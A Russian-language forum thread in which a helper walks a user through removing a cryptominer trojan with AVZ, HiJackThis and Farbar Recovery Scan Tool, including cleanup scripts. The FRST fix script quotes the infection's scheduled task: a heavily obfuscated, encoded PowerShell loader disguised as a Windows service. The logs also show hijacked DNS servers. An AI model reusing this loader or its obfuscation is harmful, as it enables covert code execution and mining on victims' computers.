[РЕШЕНО] Помогите с удалением HEUR. trojan.win64.Miner.gen

[Николай8911 0]

После каждого включения ноутбука, вылезает это предупреждение, любые действия не дают результата лечению, пытался удалять, папка Finger Print воскресала 

CollectionLog-2021.07.06-00.07.zip

Изменено 5 июля, 2021 пользователем Николай8911

[thyrex 1 468]

Выполните скрипт в AVZ из папки Autologger

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
TerminateProcessByName('c:\program files (x86)\transmission\transmission-qt.exe');
 SetServiceStart('Transmission', 4);
 DeleteFile('c:\program files (x86)\transmission\transmission-qt.exe','32');
 DeleteFile('C:\Program Files (x86)\Transmission\libcrypto-1_1.dll','32');
 DeleteFile('C:\Program Files (x86)\Transmission\libcurl.dll','32');
 DeleteFile('C:\Program Files (x86)\Transmission\libssl-1_1.dll','32');
 DeleteFile('C:\Program Files (x86)\Transmission\platforms\qwindows.dll','32');
 DeleteFile('C:\Program Files (x86)\Transmission\Qt5Core.dll','32');
 DeleteFile('C:\Program Files (x86)\Transmission\Qt5DBus.dll','32');
 DeleteFile('C:\Program Files (x86)\Transmission\Qt5Gui.dll','32');
 DeleteFile('C:\Program Files (x86)\Transmission\Qt5Network.dll','32');
 DeleteFile('C:\Program Files (x86)\Transmission\Qt5Widgets.dll','32');
 DeleteFile('C:\Program Files (x86)\Transmission\Qt5WinExtras.dll','32');
 DeleteFile('C:\Program Files (x86)\Transmission\zlib.dll','32');
 DeleteService('Transmission');
 DeleteSchedulerTask('Microsoft\Windows\SMB\UninstallSMB1ClientTask');
 DeleteSchedulerTask('Microsoft\Windows\SMB\UninstallSMB1ServerTask');
 DeleteSchedulerTask('OneDrive Standalone Update Task-S-1-5-21-438035812-1675292560-202865291-500');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
ExecuteRepair(9); 
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

Пофиксите в HiJackThis из папки Autologger

O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] = (no file) (2019/10/03)
O4-32 - HKLM\..\Run: [Skrinshoter] = C:\Program Files (x86)\Skrinshoter\skrinshoter.exe -s (file missing)
O7 - Policy: HKCU\..\Policies\Explorer\DisallowRun: [11] = Cube.exe (disabled)
O7 - Taskbar policy: HKCU\..\Policies\Explorer: [DisallowRun] = 1
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\E&xport to Microsoft Excel: (default) = C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE (file missing)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Se&nd to OneNote: (default) = C:\Program Files (x86)\Microsoft Office\root\Office16\ONBttnIE.dll (file missing)
O17 - DHCP DNS 1: 178.175.133.58
O17 - DHCP DNS 2: 37.1.207.126
O17 - HKLM\System\CCS\Services\Tcpip\..\{5ea0e818-fce3-4703-9c5c-f19c0603602c}: [NameServer] = 178.175.133.58
O17 - HKLM\System\CCS\Services\Tcpip\..\{5ea0e818-fce3-4703-9c5c-f19c0603602c}: [NameServer] = 37.1.207.126
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)

 

Скачайте по ссылке в правилах актуальную версию Autologger; прикрепите к следующему сообщению НОВЫЕ логи.
 

[Николай8911 0]

Я не  могу скачать нужную версию Autologger, т.к при переходе по ссылке, она закрывается и скачивание не начинается. Зеркало поступает также. Что можно сделать в таком случае?

HiJackThis.log

Изменено 5 июля, 2021 пользователем Николай8911

[thyrex 1 468]

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.

3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

[Николай8911 0]

Скоро будет

 

Готово.

FRST.rar

Изменено 5 июля, 2021 пользователем Николай8911
Редактирование

[thyrex 1 468]

Цитата

Malwarebytes Anti-Malware, версия 2.2.1.1043
Malwarebytes version 4.1.0.56

удалите через Установку программ

 

1. Выделите следующий код:

Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-527668085-2229568291-2296864942-1000\...\MountPoints2: {52c10e35-bd50-11eb-80f1-283926445766} - "E:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-527668085-2229568291-2296864942-1000\...\MountPoints2: {52c10e5e-bd50-11eb-80f1-283926445766} - "E:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-527668085-2229568291-2296864942-1000\...\MountPoints2: {b07efe85-4bc4-11ea-ba99-283926445766} - "G:\Autorun.exe" 
GroupPolicy: Ограничение - Windows Defender <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Task: {E5E68000-3DA6-40D3-B155-3E5A6E8EEC62} - System32\Tasks\Microsoft\Windows\User Profile Service\User Profile Service => powershell.exe -c "$sHoe='vGe+WJwv3jWpWfdfzEjaP8Iy1GT+TMZulQiYRs5WhheLZ40etnz2VZAO8xqWebBwlQ/cYN0tmSehVZFn3F6lE5sQjRSFL9RVqCy4XpVD2R6VMdFilxqAfcBaiXbuFIkorxmcUrYcgyiWb5kCsCy1TMtMo0PMLq42003WO8IgyyHoTL9VmA+cGYxXrx2QLrYe+lzmC5Ab5A+/JqRDjxqCfYUh1GT+WN8ik1KpEI0WljmRdI4p/WrqCIAd40bGev9sjhrYLZInpXb/A6VhhBKcQcUMgEPAcs8L6mH7A9ha50DGbu1wwFuRJ6dshFf/ApRpjw+NVMhCxRuAPcUJ636tKZEf4w6RX/FkmETHe91tlWa6Wb9VmA+cGYxXoheKdoQJ7FO5QKMM+Bagfe1ly0uwfZJgnmKyWYpjllGHHoscggzEU5gI7GvuVKwxuSiWbvthkC2GaIRsgi2+A5d2zzuNCLMckgiLbpIey3rxH4QTv1LLNbBSmB6HXY9MnmGyWM0vwVTMFcpb10+PNosP4WahU94X8VO5dfB0oFuAbcAknmC6QtQ0yAfMD9BEph2QLbMa9mrsF8VT2hKMdfN1kF/SKc1EkX3zHJFrwUjTWIsT3COXdJMS9mneIYgf4xO/JqRhnwzLUo1ohG3HS950jgmGGMlKhE/OW4wa7GbeQN8N/hXKR/NhiRe+M9pM2i2+AtUvyFXBR4gfyVyXMcFW9GujScwFsxGIN6Mi0xyMZMIyjWD2AoF9xRaCV9xbzwyPItoGvG/nR8cW4w+SJrEv2RWJJolnwSvqGZQ5iEHMFcNCxQrZW7IC63rmF8sw8g/MS/tirxqSfIV6hFigS6d0hB2cGcldgBzNO8UJtk/vFooJ1g6Wc8xlmRaRbIN9zSH8EIh1hEfMDs8skh2WQYYe9nq+XpAfrF+Qb+492Q3NToV9omDpAYtokhnAVdpdghzZJJMI6CDQDoQK4gihc/plxhaFIbtgnnHHVYdiwVGGGcFK0UrNe4QD8Xr+XpdD8x6BPLZbrgaQfYVk3kb1H5Jjkwi1Rts/kxeJQoAI/Ti3KZEM/hWFNLZumAjOZoJjlWbuUbd/kgiNEc8wrla3dJMe+WPRH4Qa8gnKOOxzjVGkbJRblXbqHop1hC+cDoQYjFDNKchVymviHrER0hWGNLcp1F/LLYFt2yfvSI1zixODE8NQ2gWNZslbtWDsDsVa5VKZeeZpiQLHe91So3zpBYFrzyiNBJVXpBaHb4US9mneQN8rwz3aMtlliSyXe4lnly2+A809xR3VVMUL3FyWLpIL9Gf3UsdetVfQNbdbzSLYLY80wD7zF8wigFzFGZBZ0FGfJI5GsGfmAsVa5SDTQbcggV+sfJQko3HoGIphnBmED4QQh1DAYcFW/X+jTcwFswPfPrw71TGGfs1Gkm//EpAmsgWbCIQUzyyMcoQa/GftHcsz4g+HZLYkiQ2WbMwtgl6rLMhdkxmOIcUByFHKQ40U62urU94X8VPGZLd72RDeK9ArjWD2AoF9xRPVXtBbnAWBbJIe42v7E5EDsxTfOPEujgqBepR7mWv9WdQqwSe7BZINhBXKTYAP8FO5QKgX+VPXLK4w0V/HZs5FlWv9BYwvyEfMDpJEhR2HIMkgy3fwDoATuS+HZOouuBGAZoRgnmLHS95TtTrQUqYclTqddIQIsCrsU8xev1+LN7w2lgrWcJJClz39U809xQ6bQboMkxG5Ots+623iCoA69g+DT+pylBGEIbtKn2vsFJZyvEbSKI47gAuBNtUo7HzqFIJWswmRNbc72Q3eUrNwg3H/HMpIhAjGK4Qbsx2VdYQI7FO5QKYM8hqWebYknBvIK8Z4zSexVZZ1yEfMDs84jRSLd6AO7GHRH4EX5R6BaKMkmx6PeoUy1He0JJdjkz2PGY8N3FyRYdpf6iDzCIoG7kbGbKUkj1GkbJRblXbqHop1hFTBAK4MlVWqdY0Xow==';&('ikgEekgEx'-replace'kgE')('$d=([regex]::Matches(''=kSKnkCZkgyZuV0Zrlmc0N1JrcCdldkL4YEVVpjOddmbpV0ZrR2bjV0Zr5WRuQHeFd2alRlLtVGdFd2azlXRnt2UbdCK4V0ZrVWRntWaoACeFd2alV0Zrl2OpIXZi1WduxWYpJXZT5iai9GJgsCInAyJgsCIsVGZv1kLqJ2bkgCIpkSZvh0ckgyZulmc0V0ZrNFNFd2a2U2chV0ZrJUbvV0ZrJnR6oTX0JXZ252bD5SblR3c5N1WoAyYFd2alRGI9ACZksjclJWb15GbhlWRntmclNFIswWZFd2ak9WTgQ3YlV0ZrxWZzBCfg03JwUkVJJFRMFURnt2QJNVWIBFXuwFXnAScl1CIElUZFd2ajlmdlRkLfRyegUmcFd2alh2dgwHIlZXaFd2ayR2aFd2azlGZfJzMFd2aulWRnt2dgkWb3dGI9AiaiV0Zr9GJ9tjYjRCIuJXRntWd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvV0ZrhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvV0ZrhnYtASKyUTMgI3bi1CIzRCIk5WRntWYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvV0ZrZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVWRntGd5JEdFd2aldkL4YEVVpjOddmbFd2apR2bj5WRuQXRntGelRlLtVWRntGdzl3UbBSPgIWRntGcksXKzNXRntWYwRSXn5WayV0ZrR3cbBCLiV0ZrNGJd11WlRXRntWeitFKjVWRntGZg42bpR3YFd2auVnZ'',''.'',''RikgEghkgEtTkgEoLkgEeft'')|FokgErEakgEch {$kgE_kgE.valkgEue}) -jkgEo'+'in '''';$d=[TekgExt.EncokgEding]::UTkgEF'+2*2*2+'.GekgEtString([ConkgEvert]::Fro'+'mkgEB'+'ase'+8*8+'StrikgEng($kgEd));&(''ikgEekgEx'')($d -repkgElace''kkgEgE'');'-replace'kgE')"
2021-07-05 22:58 - 2021-07-05 23:46 - 000000000 ____D C:\ProgramData\FingerPrint
CustomCLSID: HKU\S-1-5-21-527668085-2229568291-2296864942-1000_Classes\CLSID\{11C9DD7B-CCF5-4502-90A1-FEE8889976D5}\InprocServer32 -> C:\Users\User\AppData\Roaming\Yandex\YandexDisk2\3.2.6.4175\YandexDisk3ShellExt-1511.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-527668085-2229568291-2296864942-1000_Classes\CLSID\{18224999-F24B-43ee-B697-9427587FDC9C}\InprocServer32 -> C:\Users\User\AppData\Roaming\Yandex\YandexDisk2\3.2.6.4175\YandexDisk3ShellExt-1511.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-527668085-2229568291-2296864942-1000_Classes\CLSID\{847202AE-CDE0-469A-AF10-8798E02DED83}\InprocServer32 -> C:\Users\User\AppData\Roaming\Yandex\YandexDisk2\3.2.6.4175\YandexDisk3ShellExt-1511.dll => Нет файла
ContextMenuHandlers1: [SecureExt] -> {D23C3BA7-6DC3-4DDF-9BDF-12599E852A40} =>  -> Нет файла
ContextMenuHandlers2: [SecureExt] -> {D23C3BA7-6DC3-4DDF-9BDF-12599E852A40} =>  -> Нет файла
ContextMenuHandlers6: [SecureExt] -> {D23C3BA7-6DC3-4DDF-9BDF-12599E852A40} =>  -> Нет файла
ContextMenuHandlers1_S-1-5-21-527668085-2229568291-2296864942-1000: [Yandex.Disk.3] -> {847202AE-CDE0-469A-AF10-8798E02DED83} => C:\Users\User\AppData\Roaming\Yandex\YandexDisk2\3.2.6.4175\YandexDisk3ShellExt-1511.dll -> Нет файла
ContextMenuHandlers4_S-1-5-21-527668085-2229568291-2296864942-1000: [Yandex.Disk.3] -> {847202AE-CDE0-469A-AF10-8798E02DED83} => C:\Users\User\AppData\Roaming\Yandex\YandexDisk2\3.2.6.4175\YandexDisk3ShellExt-1511.dll -> Нет файла
AlternateDataStreams: C:\ProgramData\.rdata:X [128]
FirewallRules: [{98572EA6-8B08-40F4-AA3E-3EFE8F960D5F}] => (Allow) E:\dps\bin\tools\aria2c.exe => Нет файла
FirewallRules: [{21083C19-D8DB-48FA-A748-548727FBE101}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe => Нет файла
FirewallRules: [{C2AE3B5E-3BC1-43BA-A4E6-DD4202AEE0EE}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe => Нет файла
FirewallRules: [TCP Query User{554E02F0-CAB9-420C-84BF-78F6609CE8A3}D:\assassins creed 2\assassinscreediigame.exe] => (Block) D:\assassins creed 2\assassinscreediigame.exe => Нет файла
FirewallRules: [UDP Query User{8F900742-DAC6-4EA5-A95B-F0D54C3F2EFE}D:\assassins creed 2\assassinscreediigame.exe] => (Block) D:\assassins creed 2\assassinscreediigame.exe => Нет файла
FirewallRules: [TCP Query User{B00A9DDB-A0DA-4900-90EF-DF4771BD47FB}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_45\bin\javaw.exe => Нет файла
FirewallRules: [UDP Query User{53ED8033-6A2B-4855-B8B1-CA597D362658}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_45\bin\javaw.exe => Нет файла
FirewallRules: [TCP Query User{71693BA6-6FAA-4F89-B54D-F7F1A17EE7B6}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_111\bin\javaw.exe => Нет файла
FirewallRules: [UDP Query User{A35AD7B2-4CA1-4EED-8965-5D3281DC72DD}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_111\bin\javaw.exe => Нет файла
FirewallRules: [TCP Query User{FAF4964D-623C-4E66-B746-A2423E84622E}C:\users\user\appdata\local\temp\nsyad07.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nsyad07.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [UDP Query User{6C8133E1-515B-44FA-B459-3417BF7999C5}C:\users\user\appdata\local\temp\nsyad07.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nsyad07.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [TCP Query User{667058D4-D1E4-4D7D-A135-688D51D0474B}D:\battlefield 2\bf2.exe] => (Allow) D:\battlefield 2\bf2.exe => Нет файла
FirewallRules: [UDP Query User{F587A5EC-0A8A-46AC-9C7C-92AD8FD33DC7}D:\battlefield 2\bf2.exe] => (Allow) D:\battlefield 2\bf2.exe => Нет файла
FirewallRules: [TCP Query User{839C126C-A8D7-4CC6-ACB0-5B2C2B993B76}C:\users\user\appdata\local\temp\nsq3eef.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nsq3eef.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [UDP Query User{BDE4BAE3-5F6F-4E59-B815-603C435B5C3E}C:\users\user\appdata\local\temp\nsq3eef.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nsq3eef.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [TCP Query User{695CE159-ADAE-4DE4-A98F-F19A804953C8}C:\users\user\appdata\local\temp\nsf3b12.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nsf3b12.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [UDP Query User{9A96E52F-2C4F-4A66-B6E4-025E9263312D}C:\users\user\appdata\local\temp\nsf3b12.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nsf3b12.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [{34A48BD7-8E42-4BF7-BC11-B0A6E2D2C442}] => (Block) C:\users\user\appdata\local\temp\nsf3b12.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [{82623A1A-1745-4C28-B522-2F3767751C5F}] => (Block) C:\users\user\appdata\local\temp\nsf3b12.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [TCP Query User{BCD11B5A-5BF6-4B06-8ECC-0B0A31150DE2}C:\users\user\appdata\local\temp\nss18c7.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nss18c7.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [UDP Query User{36714EF0-F84C-4427-9FDE-E7293B4C6153}C:\users\user\appdata\local\temp\nss18c7.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nss18c7.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [TCP Query User{91140AF2-B423-4A36-880D-5DFF920AD020}C:\users\user\appdata\local\temp\nsb263e.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nsb263e.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [UDP Query User{3A9D451E-39C2-41FC-B46D-E0BEA372A0A6}C:\users\user\appdata\local\temp\nsb263e.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nsb263e.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [{DC37DD34-6791-45EE-A188-539999DFF17D}] => (Allow) D:\Battlefield 2\prbf2.exe => Нет файла
FirewallRules: [{9373DC6F-2772-4FA6-8C30-45E825F0B719}] => (Allow) D:\Battlefield 2\mods\pr\bin\PRLauncher.exe => Нет файла
FirewallRules: [{FBEE9A54-E872-493D-8C7D-13A9246FDFBC}] => (Allow) D:\Battlefield 2\mods\pr\bin\PRUpdater.exe => Нет файла
FirewallRules: [{1F15BD27-BDBB-4239-86EE-6EC82EC12C58}] => (Allow) D:\Battlefield 2\mods\pr\bin\PRMumble\PRMumble.exe => Нет файла
FirewallRules: [TCP Query User{654B4DA6-DC07-4D5D-9905-3281A711007B}C:\program files\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_51\bin\javaw.exe => Нет файла
FirewallRules: [UDP Query User{FC4EF2FF-17E4-48A3-87B9-59CF2B572563}C:\program files\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_51\bin\javaw.exe => Нет файла
FirewallRules: [TCP Query User{C41BFBAB-1A35-4684-A3F4-5756F1859952}C:\users\user\appdata\roaming\.tlauncher\jvms\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\users\user\appdata\roaming\.tlauncher\jvms\jre1.8.0_51\bin\javaw.exe => Нет файла
FirewallRules: [UDP Query User{9A903F5D-14E8-4CBC-83DC-686756376864}C:\users\user\appdata\roaming\.tlauncher\jvms\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\users\user\appdata\roaming\.tlauncher\jvms\jre1.8.0_51\bin\javaw.exe => Нет файла
FirewallRules: [TCP Query User{9341090B-8B08-45D8-84D2-784EC1AC90F3}C:\games\company of heroes 2\reliccoh2.exe] => (Allow) C:\games\company of heroes 2\reliccoh2.exe => Нет файла
FirewallRules: [UDP Query User{2A6665B7-CD53-4A42-8B35-483F6B80085C}C:\games\company of heroes 2\reliccoh2.exe] => (Allow) C:\games\company of heroes 2\reliccoh2.exe => Нет файла
FirewallRules: [TCP Query User{FBAB14E9-0205-4062-9493-0F8907790C2B}C:\program files (x86)\saints row 4.v 1.0u9 + 24 dlc\saintsrowiv.exe] => (Block) C:\program files (x86)\saints row 4.v 1.0u9 + 24 dlc\saintsrowiv.exe => Нет файла
FirewallRules: [UDP Query User{79B49D69-A4E4-4A3D-B332-4EC0E0FDE458}C:\program files (x86)\saints row 4.v 1.0u9 + 24 dlc\saintsrowiv.exe] => (Block) C:\program files (x86)\saints row 4.v 1.0u9 + 24 dlc\saintsrowiv.exe => Нет файла
FirewallRules: [TCP Query User{159952E8-1AE4-43F8-AE9B-C789EDD5500A}C:\scrap.mechanic.v0.3.5\release\scrapmechanic.exe] => (Allow) C:\scrap.mechanic.v0.3.5\release\scrapmechanic.exe => Нет файла
FirewallRules: [UDP Query User{5DD685B6-9F7A-4D39-A21D-21A308D2D0A1}C:\scrap.mechanic.v0.3.5\release\scrapmechanic.exe] => (Allow) C:\scrap.mechanic.v0.3.5\release\scrapmechanic.exe => Нет файла
FirewallRules: [TCP Query User{E686B445-D8E3-4A47-AE0C-DF2C9323367D}C:\games\project zomboid build 41.16\projectzomboid32.exe] => (Allow) C:\games\project zomboid build 41.16\projectzomboid32.exe => Нет файла
FirewallRules: [UDP Query User{F5CEF2E1-17D3-4124-84D0-26C1C0F06B29}C:\games\project zomboid build 41.16\projectzomboid32.exe] => (Allow) C:\games\project zomboid build 41.16\projectzomboid32.exe => Нет файла
FirewallRules: [{ED935937-6A49-4C53-94EF-CA63BE7ED3E9}] => (Allow) C:\Garrys mod\steamapps\common\GarrysMod\hl2.exe => Нет файла
FirewallRules: [{C8D1F8B4-3482-4F90-976F-06D8D04F75DC}] => (Allow) C:\Garrys mod\steamapps\common\GarrysMod\hl2.exe => Нет файла
FirewallRules: [{6982568D-ADE6-41CA-BE70-53F686B93FA3}] => (Allow) C:\Garrys mod\steamapps\common\Team Fortress 2\hl2.exe => Нет файла
FirewallRules: [{221A6450-78F5-492A-B772-6D582B01C750}] => (Allow) C:\Garrys mod\steamapps\common\Team Fortress 2\hl2.exe => Нет файла
FirewallRules: [TCP Query User{68121D1C-5E7F-4E14-8A53-A96887874C49}C:\games\cybermotion v0.13\cybermotion.exe] => (Allow) C:\games\cybermotion v0.13\cybermotion.exe => Нет файла
FirewallRules: [UDP Query User{0B90A2EC-D93F-4FE1-AE73-E4CA416CC5AD}C:\games\cybermotion v0.13\cybermotion.exe] => (Allow) C:\games\cybermotion v0.13\cybermotion.exe => Нет файла
FirewallRules: [TCP Query User{75B76A3E-954A-446A-8B09-F0CE4F9085A8}C:\program files (x86)\radmir launcher\radmir_launcher.exe] => (Block) C:\program files (x86)\radmir launcher\radmir_launcher.exe => Нет файла
FirewallRules: [UDP Query User{DC2AABFC-3874-47E9-B65E-9DD2B087D889}C:\program files (x86)\radmir launcher\radmir_launcher.exe] => (Block) C:\program files (x86)\radmir launcher\radmir_launcher.exe => Нет файла
FirewallRules: [TCP Query User{FE47B210-EAA9-4DB6-98AB-37DC66BBAF4C}C:\program files (x86)\radmir launcher\radmir_launcher_ex.exe] => (Allow) C:\program files (x86)\radmir launcher\radmir_launcher_ex.exe => Нет файла
FirewallRules: [UDP Query User{86C17AA8-4DEB-477F-92FE-60E002B93A83}C:\program files (x86)\radmir launcher\radmir_launcher_ex.exe] => (Allow) C:\program files (x86)\radmir launcher\radmir_launcher_ex.exe => Нет файла
FirewallRules: [TCP Query User{1D7ECBF9-AAFD-4406-A2FD-D5A2051EBE39}C:\users\user\desktop\лаунчер\radmir launcher\radmir_launcher.exe] => (Allow) C:\users\user\desktop\лаунчер\radmir launcher\radmir_launcher.exe => Нет файла
FirewallRules: [UDP Query User{ABDA4D1F-DAC7-4470-A8AC-1CE85E5684F4}C:\users\user\desktop\лаунчер\radmir launcher\radmir_launcher.exe] => (Allow) C:\users\user\desktop\лаунчер\radmir launcher\radmir_launcher.exe => Нет файла
FirewallRules: [TCP Query User{630637D1-79DD-4FA9-9DE8-81C03C3E759E}C:\users\user\desktop\лаунчер\radmir launcher\radmir_launcher_ex.exe] => (Allow) C:\users\user\desktop\лаунчер\radmir launcher\radmir_launcher_ex.exe => Нет файла
FirewallRules: [UDP Query User{94A83419-431A-480B-9168-610C1DDE13B5}C:\users\user\desktop\лаунчер\radmir launcher\radmir_launcher_ex.exe] => (Allow) C:\users\user\desktop\лаунчер\radmir launcher\radmir_launcher_ex.exe => Нет файла
FirewallRules: [TCP Query User{6DE58433-F7C3-4C56-943C-1558E232CF5C}C:\radmir rp\radmir launcher\radmir_launcher.exe] => (Allow) C:\radmir rp\radmir launcher\radmir_launcher.exe => Нет файла
FirewallRules: [UDP Query User{5267FF1B-82D3-467D-8B48-8CE7E3880714}C:\radmir rp\radmir launcher\radmir_launcher.exe] => (Allow) C:\radmir rp\radmir launcher\radmir_launcher.exe => Нет файла
FirewallRules: [TCP Query User{12AE5AC1-41B8-4E43-9742-24BF638E9C66}C:\radmir rp\radmir launcher\radmir_launcher_ex.exe] => (Allow) C:\radmir rp\radmir launcher\radmir_launcher_ex.exe => Нет файла
FirewallRules: [UDP Query User{BEFF33A6-E078-49C7-967F-3D67C8B6B218}C:\radmir rp\radmir launcher\radmir_launcher_ex.exe] => (Allow) C:\radmir rp\radmir launcher\radmir_launcher_ex.exe => Нет файла
FirewallRules: [TCP Query User{E79FBEA6-6EB4-413B-A7D5-4C725336598B}C:\users\user\desktop\сервер\samp-server.exe] => (Allow) C:\users\user\desktop\сервер\samp-server.exe => Нет файла
FirewallRules: [UDP Query User{7F2B6913-EBEE-41F9-A3FF-E579DA6C1A45}C:\users\user\desktop\сервер\samp-server.exe] => (Allow) C:\users\user\desktop\сервер\samp-server.exe => Нет файла
FirewallRules: [TCP Query User{82F6B4C9-7FD9-4915-A1F6-D151CFCE727F}C:\users\user\desktop\samp\samp-server.exe] => (Allow) C:\users\user\desktop\samp\samp-server.exe => Нет файла
FirewallRules: [UDP Query User{C592821D-1399-43EC-8073-711FD8D02A95}C:\users\user\desktop\samp\samp-server.exe] => (Allow) C:\users\user\desktop\samp\samp-server.exe => Нет файла
FirewallRules: [{68197BFA-94E1-4E49-B30C-36BC81F5A14F}] => (Allow) %ProgramFiles% (x86)\Grand Theft Auto San Andreas + MultiPlayer [0.3e]\samp.exe => Нет файла
FirewallRules: [{840B030D-670A-469F-995D-DFA0FD921C38}] => (Allow) %ProgramFiles% (x86)\Grand Theft Auto San Andreas + MultiPlayer [0.3e]\samp.exe => Нет файла
FirewallRules: [{B3854E76-F257-4E93-9B37-650E564D9E42}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe => Нет файла
FirewallRules: [{DDF33AE1-A834-49FC-A75A-C87BB94D1F52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe => Нет файла
